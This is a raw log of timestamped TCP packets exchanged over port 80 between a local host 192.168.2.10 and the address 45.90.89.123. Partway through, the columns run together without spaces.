Oct 2, 2024 05:29:27.936849117 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.936861038 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.936872005 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.936913013 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.936939955 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.936949968 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.936960936 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.936973095 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.937057018 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.937057018 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.937067032 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.937077999 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.937098026 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.937109947 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.937124014 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.937181950 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.937820911 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.937832117 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.937844038 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.937887907 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.937927008 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.937937975 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.937948942 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.937959909 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.937980890 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.937980890 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.937995911 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.938000917 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.938023090 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.938033104 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.938055992 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.988951921 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.064408064 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.064433098 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.064445972 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.064456940 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.064480066 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.064491034 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.064501047 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.064511061 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.064517975 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.064522982 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.064538002 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.064549923 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.064553976 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.064564943 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.064588070 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.064620018 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.064929008 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.064979076 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.064989090 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065022945 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065023899 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.065032959 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065162897 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.065190077 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065201044 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065212011 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065269947 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065282106 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065289974 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.065289974 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.065320015 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.065476894 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065495968 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065509081 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065536976 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.065607071 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065618038 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065628052 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065640926 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065663099 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.065687895 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.065766096 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065777063 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065787077 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065799952 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065812111 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065819025 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.065819025 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.065854073 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.065884113 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065893888 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065903902 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.065952063 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.066412926 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.066422939 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.066433907 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.066483021 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.066483021 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.066520929 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.066533089 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.066544056 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.066555977 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.066581964 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.066603899 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.066696882 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.066706896 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.066718102 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.066729069 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.066747904 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.066760063 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.066770077 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.066781998 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.066803932 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.066803932 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.066803932 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.066854000 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.067363977 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.067374945 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.067394018 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.067408085 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.067464113 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.067475080 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.067486048 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.067502975 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.067528009 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.067528009 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.067612886 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.067624092 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.067632914 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.067642927 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.067652941 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.067657948 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.067668915 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.067668915 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.067681074 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.067689896 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.067702055 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.068268061 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.068331957 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.068339109 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.068351030 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.068360090 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.068387032 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.068391085 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.068397045 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.068408012 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.068419933 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.068460941 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.068486929 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.068499088 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.068622112 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.151149035 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.151171923 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.151182890 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.151195049 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.151211977 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.151221991 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.151232958 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.151245117 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.151272058 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.151333094 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.193645954 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.193664074 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.193675995 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.193691015 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.193701029 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.193707943 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.193840981 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.193851948 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.193856955 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.193864107 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.193875074 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.193876028 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.193907976 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.193914890 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.193953037 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.193953037 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.193969965 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.193981886 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194036007 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.194042921 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194060087 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194072008 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194108009 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.194158077 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194170952 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194181919 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194192886 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194205999 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194209099 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.194230080 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.194272041 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.194400072 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194411993 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194423914 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194454908 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.194462061 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194473982 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194484949 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194497108 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194499969 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.194590092 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.194649935 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194662094 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194673061 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194681883 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194735050 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.194735050 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:28.194776058 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194833994 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:28.194844961 CEST  80           49707      45.90.89.123   192.168.2.10
                                                              Oct 2, 2024 05:29:28.194855928 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.194868088 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.194892883 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.194892883 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.194955111 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.194982052 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.194993019 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195003986 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195014954 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195025921 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195039988 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.195070028 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.195122957 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195133924 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195148945 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195162058 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195187092 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.195187092 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.195388079 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195436954 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195449114 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195465088 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.195507050 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.195511103 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195522070 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195533037 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195544958 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195574045 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.195574045 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.195679903 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195691109 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195703030 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195713043 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195724010 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195736885 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195749044 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195775986 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.195775986 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.195812941 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195822954 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.195826054 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.195866108 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.198801041 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.198812008 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.198829889 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.198853016 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.198879957 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.198892117 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.198904037 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.198915958 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.198929071 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.198957920 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.198976040 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.199039936 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199050903 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199062109 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199073076 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199084044 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199095011 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199100018 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.199100971 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199112892 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199115992 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.199126005 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199141979 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.199189901 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.199201107 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199217081 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199229002 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199239969 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199251890 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199264050 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199265957 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.199278116 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199322939 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.199322939 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.199405909 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.199407101 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199418068 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199424982 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199489117 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199505091 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.199506044 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199521065 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199532986 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199542999 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199562073 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.199562073 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.199564934 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199577093 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199592113 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.199605942 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199620962 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199645996 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.199652910 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.199734926 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199748039 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199759007 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199771881 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199784040 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.199820995 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.199893951 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.238132000 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.238168001 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.238179922 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.238190889 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.238202095 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.238209009 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.238214016 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.238224983 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.238235950 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.238260031 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.238270044 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.238279104 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.238280058 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.238292933 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.238305092 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.238305092 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.238308907 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.238349915 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.238349915 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.238367081 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.238378048 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.238432884 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.280458927 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.280481100 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.280507088 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.280524015 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.280539036 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.280554056 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.280570984 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.280585051 CEST804970745.90.89.123192.168.2.10
